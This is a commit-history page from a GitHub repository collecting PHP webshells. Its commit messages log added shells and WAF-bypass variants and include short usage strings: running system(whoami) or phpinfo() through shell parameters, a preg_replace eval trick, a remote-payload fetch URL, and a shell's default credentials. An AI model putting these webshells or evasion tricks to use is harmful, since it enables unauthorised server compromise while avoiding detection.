Commit graph

259 commits

Author SHA1 Message Date
tennc
a978dd7e54
Create readme.md 2021-05-30 18:46:35 +08:00
tennc
12f29dea9a
add test.txt @jweny 👍
from : https://github.com/jweny/MemShellDemo
2021-05-26 23:05:31 +08:00
tennc
28770e0fc8
add MemphpShell @MemShell 👍
from :https://github.com/jweny/MemShellDemo
2021-05-26 23:04:25 +08:00
tennc
c3153bff1b
wso.php 2021 @twepl 👍
update wso.php for php8 
from : https://github.com/twepl/wso
2021-04-03 16:16:53 +08:00
tennc
db62a9c082
Create AntSword_2021-03-06.php
from : https://xz.aliyun.com/t/9218
2021-03-06 17:09:30 +08:00
tennc
8e77847595
add create_webshell_with_py.py @pureqh :💯
Create webshell
from:https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
github: https://github.com/pureqh/webshell
author: pureqh
2021-01-04 21:54:14 +08:00
tennc
b59b949389
Create bypass-with-base32.php 2021-01-04 21:50:18 +08:00
tennc
eafae576c9
Create bypass2021-01-04-01.php
from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
2021-01-04 21:47:58 +08:00
tennc
a6546d03ee
Create getConstants2.php
use: xxx/webshell/1?<>=system(whoami)
from : https://xz.aliyun.com/t/8684
2020-12-28 22:15:54 +08:00
tennc
fd35f195c1
Create getConstants.php
use: xxxxxx/getConstants?1=phpinfo()
from : https://xz.aliyun.com/t/8684
2020-12-28 01:08:19 +08:00
tennc
b66c3bb616
add YXNzZXJ0YWE.php bypass 啊D
from: https://xz.aliyun.com/t/8684
2020-12-28 01:05:10 +08:00
tennc
f875e7b780
Create Shu1337.php
from: https://github.com/linuxsec/shu-shell
@linuxsec 👍
2020-11-18 22:20:42 +08:00
tennc
7105ac90a5
Create get1.php
use: "`****`"

from: 19e3e0ab25

@thephenix4 👍
2020-10-11 19:11:12 +08:00
tennc
976ca14a7d
Create webshell-without-alphanumeric2.php
what ?? 
from: 3ea2d589ae

@oktavandi 👍
2020-10-11 19:07:02 +08:00
tennc
df832d0366
Create cotent01.md
from : https://blog.mrcl0wn.com/2019/01/hold-door-hold-backdoor-php.html
2020-09-22 13:06:26 +08:00
tennc
43d9582172
Create php_webshell.py
create bypass safedog webshell  with python
from : https://github.com/pureqh/webshell
thanks to pureqh 👍
2020-09-05 17:44:37 +08:00
tennc
719eb9131d
Create ass.php
请求时,设置Referer头,后面以”ass****”结尾即可,比如:Referer: http://www.target.com/ass.php。
在使用Cknife时,注意软件实现有缺陷,会从第二个”:”处截断,可改成Referer: http%3a//www.target.com/ass.php
from : http://alin.run/2020/08/04/php-webshell-bypass/
2020-09-03 21:00:49 +08:00
tennc
2bea3becb2
Create 2020-08-31-01.php
from: https://github.com/clm123321/tongda_oa_rce/blob/master/tongda.py#L145
2020-08-31 21:39:22 +08:00
tennc
e864fcd511
Create create_code_with_xor.py
create some code for php xor to bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-30 14:05:29 +08:00
tennc
23aea8530d
Create 2020.08.20.20.php
maybe bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
2020-08-21 19:52:22 +08:00
tennc
cbd7b8ef98
Create 2020.08.20.19.php
bypass by safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:09:52 +08:00
tennc
12ad35eb0f
Create 2020.08.20.18.php
bypass safedog
https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:08:25 +08:00
tennc
0d1874b235
Create 2020.08.20.17.php
killed by safedog
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 13:07:32 +08:00
tennc
cd1e25025a
Create 2020.08.20.16.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 13:03:10 +08:00
tennc
ecc1fb09ee
Create 2020.08.20.15.php
use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
2020-08-20 12:48:04 +08:00
tennc
6a9169da6b
Create 2020.08.20.14.php 2020-08-20 12:40:40 +08:00
tennc
44282fe412
Create 2020.08.20.13.php
shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'')
use:  post x=phpinfo();
from: https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:38:26 +08:00
tennc
aeb2db1e19
Create 2020.08.20.12.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:35:58 +08:00
tennc
f7c1551c7f
Create 2020.08.20.11.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:54 +08:00
tennc
accce9acef
Create 2020.08.20.10.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:34:25 +08:00
tennc
63217f585d
Create 2020.08.20.09.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:33:34 +08:00
tennc
69b4a7b5bc
Create 2020.08.20.08.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:32:56 +08:00
tennc
a700c2b3d8
Create 2020.08.20.07.php
from : https://www.sqlsec.com/2020/07/shell.html
killled by safedog
2020-08-20 12:32:12 +08:00
tennc
d5f61a9c5f
Create 2020.08.20.06.php
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
2020-08-20 12:31:23 +08:00
tennc
d8cdd62ab1
Create 2020.08.20.05.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:30:06 +08:00
tennc
223d57c52c
Create 2020.08.20.04.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:29:26 +08:00
tennc
6759fd8dcc
Create 2020.08.20.03.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:28:46 +08:00
tennc
51833ad9b6
Create 2020.08.20.02.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:27:40 +08:00
tennc
820aadc6a1
Create 2020.08.20.01.php
from : https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:26:04 +08:00
tennc
67733cfcdc
Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo()
form: WX公众号 “ 渗透云笔记” Sigsh
新年从过狗开始
2020-01-30 14:30:09 +08:00
tennc
c290a06bc9
Create php7.1_bypass.php
from : https://www.anquanke.com/post/id/193787
参数$b的前面加上“n"就成功绕过了,当然同理,你也可以在参数$b的前面加上"\"、"\t"、"\r"等等也是可以绕过的。
在参数$b的前面加上"\n",""、"\t"、"\r"等等也是可以绕过的。

木马密码:a
2019-12-06 18:33:51 +08:00
tennc
7f70bb9b88
add create b374k-php shell source code
create b374k-php shell source code
2019-11-27 09:06:00 +08:00
tennc
0add9c4465
Create test.php
from:https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/test.php
use:
http://xxx.xxx/plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt
====>
optimized.php
2019-10-23 22:47:21 +08:00
tennc
f315423d0a
Create 5678.php
from: https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/5678.php
2019-10-23 22:43:48 +08:00
tennc
d656fd3574
Create admine21_decode.php
from : https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/optimized.php
2019-10-23 22:41:42 +08:00
tennc
9494a1f9ae
Update admine21.txt
decode password :admine21
2019-10-23 22:36:01 +08:00
tennc
4c6900196d
Create admine21.txt
add admine21
2019-10-23 22:21:32 +08:00
tennc
3839a603ab
Update bat_2.7.php
Login Account (Default)
Username : k4mpr3t
Password : k4mpr3t
Features
[0] File Manager
[1] Sec. Info
[2] Simply Database
[3] Interactive terminal
[4] PHP Reverse Back Connect
[5] Run PHP Code
[6] Custom Toolz
[7] Self Script Encryptor !
[8] Error Handler
[9] Themes
Self Script Encryptor
Usage : http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
2019-06-09 01:14:37 +08:00
tennc
6533a69d93
Create bat_2.7.php
form @k4mpr3t https://github.com/k4mpr3t/b4tm4n
author: k4mpr3t 👍
2019-06-09 01:12:30 +08:00
Levi Li
ddb43c6b88
Added B4TM4N ~ PHP WEBSHELL
From:https://github.com/k4mpr3t/b4tm4n
2018-12-20 15:48:19 +08:00
Levi Li
7da43f30de
webshell-detect-bypass
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php
author: Build By LandGrey
2018-12-20 11:48:35 +08:00
Levi Li
32be5d26bf
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php
Author:Build by LandGrey
2018-12-20 11:34:55 +08:00
tennc
a0a4b15bdf
Update 404.php.txt
del backdoor
2018-08-27 12:56:34 +08:00
tennc
c8ee47f1c4
Create array_intersect_uassoc-filename-last-char-must-be-s.php
from : https://github.com/LandGrey
author :  LandGrey
2018-06-02 15:22:09 +08:00
tennc
dc7dc8e614
Create gzismexv.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:24:14 +08:00
tennc
e0fabd8d29
Create general.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:23:09 +08:00
tennc
a0ca39ab62
Create error52.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:22:39 +08:00
tennc
95b44594fa
Create cvwfzthj.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:22:10 +08:00
tennc
179887ea97
Create job.php.txt
from : https://www.v2ex.com/t/415786
2017-12-19 14:21:27 +08:00
tennc
e91bee4b7e
Create wloymzuk.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:20:41 +08:00
tennc
b0b14d1271
Create session91.php
from : https://www.v2ex.com/t/415786
2017-12-19 14:19:57 +08:00
tennc
7c1bd8d461 Create mailer.php 2017-09-14 15:39:54 +08:00
tennc
230a963cc3 Create bh.php 2017-09-14 15:39:15 +08:00
tennc
4978e8fe45 Create bukapalapak.php 2017-09-14 15:38:20 +08:00
tennc
32bc0ff13e Create gamestopceker.php 2017-09-14 15:37:39 +08:00
tennc
e866373c45 Create promailerv2.php 2017-09-14 15:37:04 +08:00
tennc
8c00817dbb Create 1n73ction.php 2017-09-14 15:36:24 +08:00
tennc
797fe45b6b Create qyt0dHv1.php
from:https://pastebin.com/raw/qyt0dHv1
2017-09-14 15:27:10 +08:00
tennc
246d323416 Create adminer-4.2.4.php
from: www.adminer.org/static/download/4.2.4/adminer-4.2.4.php
2017-09-14 15:25:58 +08:00
tennc
f06b33185c Create 404 shell code.php
from : http://hackingscripts.com/scripts/404-shell-code/
2017-09-14 15:24:03 +08:00
tennc
d00091ccdf Create v4xGus6X.php
from : http://pastebin.com/raw/v4xGus6X

https://isc.sans.edu/diary/22826
2017-09-14 15:22:33 +08:00
tennc
2392aee31c Create no2.php 2017-08-21 12:22:58 +08:00
tennc
a625a73706 Create tk_dencode_1.php 2017-08-21 12:11:13 +08:00
tennc
f429c6231d Create tk.php 2017-08-21 11:55:49 +08:00
tennc
feac339759 Update Shell [ci] .Biz was here.php 2017-05-14 23:38:38 +08:00
tennc
635ed0f934 del backdoor @WHK102 👍
del backdoor 
look : https://github.com/tennc/webshell/issues/23
2017-05-14 23:14:46 +08:00
tennc
bfdd3afa32 Create php_niu_2.php
from : https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
![img](https://www.leavesongs.com/media/attachment/2017/02/17/82b376a7-08a8-4e20-9686-553f400d280d.jpg)
2017-04-19 22:30:15 +08:00
tennc
7fb678b606 Create php_niu_1.php
from : https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
[!img](https://www.leavesongs.com/media/attachment/2017/02/17/b2ac8554-37f8-448e-bc79-b7213eb2cfb8.6713f3c45766.jpg)
2017-04-19 22:29:09 +08:00
jRazer
aa4293656b PHP 7 - function set_magic_quotes_runtime removed
Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime()
2017-02-11 15:25:48 +03:00
tennc
e6902df7ef add 404.php.no.txt @burnegg 👍
del  backdoor
#20
https://github.com/tennc/webshell/issues/20
2017-01-31 01:38:29 +08:00
tennc
104adac40f Update c99shell.php
del backdoors
https://github.com/tennc/webshell/issues/18
thinks to @Varbaek
2016-10-07 16:03:24 +08:00
tennc
79a9b5885c Create bypass-safedog-2016-08-29.php
usage: http://xx.xx/xx.php?a=phpinof()
2016-08-29 21:53:58 +08:00
kilida
ebc1b5a405 Repeated subexpressions in Ani-Shell.php
Looks like repeated expressions `isset($_GET['exTime'])` and `$_GET['exTime'] != ""` can be removed.
2016-06-23 18:53:59 -04:00
tennc
ef86ed3531 Update wso-4.2.5.php
from : https://github.com/HARDLINUX/webshell/blob/master/WSO.php
2016-06-21 12:02:11 +08:00
tennc
4c90e56326 add wso_404.php @tanjiti 👍
from: https://github.com/tanjiti/webshellSample/blob/master/%5B%22PHP%22%2C%20%22dama%22%5D/wso_404.php
2016-06-16 13:41:35 +08:00
tennc
3453fe4b2c add wso-4.2.5.php @twepl 👍
form https://github.com/HARDLINUX/webshell
2016-06-11 13:09:34 +08:00
tennc
2af877568c Update SaiProbe_v1.0.php 2016-06-05 13:12:10 +08:00
tennc
da1910f9e3 add SaiProbe V1.0 @Stardustsky
author  : Stardustsky
blog : http://www.stardustsky.net/post/42.html
2016-06-05 12:55:01 +08:00
tennc
69249a2ad7 Update w.php
``` php
687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067
``` 
to
``` php
http://123.125.114.82/jxfbucket20141/hack/1.jpg
```
2016-05-27 21:52:18 +08:00
tennc
8c50cf38f8 Create w.php
from : zone.wooyun.org
2016-05-27 21:50:24 +08:00
Junior Sumbar
f15d60d8cd Mini B374k 2016-05-15 19:15:16 +07:00
tennc
374204e0a1 Create zone_hackbar_other.php 2016-05-14 10:00:16 +08:00
tennc
2ca0e86887 Update zone_hackbar_beutify.php 2016-05-14 09:59:33 +08:00
tennc
bcd3802f2a Create zone_hackbar.php 2016-05-14 09:59:03 +08:00
tennc
0f1969eb8f Create zone_hackbar_beutify.php 2016-05-14 09:57:25 +08:00
Andrew Murray
c2c5a56413 Fixed typo 2016-05-07 21:27:09 +10:00
tennc
83906eff2e Update 非常规的pHp一句话木马.php
ps:经过网友@kevins1022 测试,不可用。特说明下。
或许是我们的测试姿势不正确。先保留
2016-05-05 16:25:39 +08:00
tennc
c0b9db0a2c add wso-4.2.4.php @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-04-18 10:22:00 +08:00
tennc
1ace28d60b create version 4.2.3 @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-01-25 14:57:57 +08:00
tennc
626bc6a486 create version 4.2.2 @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-01-11 13:37:25 +08:00